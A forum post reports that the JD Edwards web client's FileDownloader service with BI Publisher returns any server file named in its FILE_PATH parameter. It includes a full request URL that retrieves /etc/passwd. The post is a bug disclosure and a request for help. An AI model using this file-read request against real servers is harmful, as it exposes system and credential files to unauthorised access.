BI Publisher + JDE Webclient get acces to all system files

Pierre Ka

Member
Hi, every one!
I'm using JDE 9.0/8.98.1.3 + BI Publisher (Embedded mode).
On web client i do next:

View Job Status -> Choose App Server -> Submit type = RD -> Select -> Raw = View RD Output -> Raw = View Output

the URL for this file looks like here below:

http://servername:port/jde/FileDownloader.mafService?e1.state=maximized&FILE_PATH=%2Fu01%2Fsmma%2Fagent_oracle%2Ftargets%2FHTML_DV%2Ftemp%2FRD_R49115_EN_2627.pdf&DATA_KEY=&e1.mode=view&e1.namespace=&e1.service=FileDownloader&CONTENT_TYPE=application%2Fpdf&r=1260192063552&RENDER_MAFLET=E1Menu&SUGGESTED_NAME=RD_R49115_EN_2627.pdf&PURGE_AFTER=false

where
FILE_PATH=%2Fu01%2Fsmma%2Fagent_oracle%2Ftargets%2FHTML_DV%2Ftemp%2FRD_R49115_EN_2627.pdf really gets file from /u01/smma/agent_oracle/targets/HTML_DV/temp/RD_R49115_EN_2627.pdf,

where BI Publisher stores all generated reports in needed formats, BUT

if you change some words in the URL like this below

http://servername:port/FileDownloader.mafService?e1.state=maximized&FILE_PATH=%2Fetc%2Fpasswd&DATA_KEY=&e1.mode=view&e1.namespace=&e1.service=FileDownloader&CONTENT_TYPE=application%2Fpdf&r=1260192247620&RENDER_MAFLET=E1Menu&SUGGESTED_NAME=passwd&PURGE_AFTER=false

FILE_PATH=%2Fetc%2Fpasswd)

you will grant the access to passwd file as it is

Where is the problem?
 
Back
Top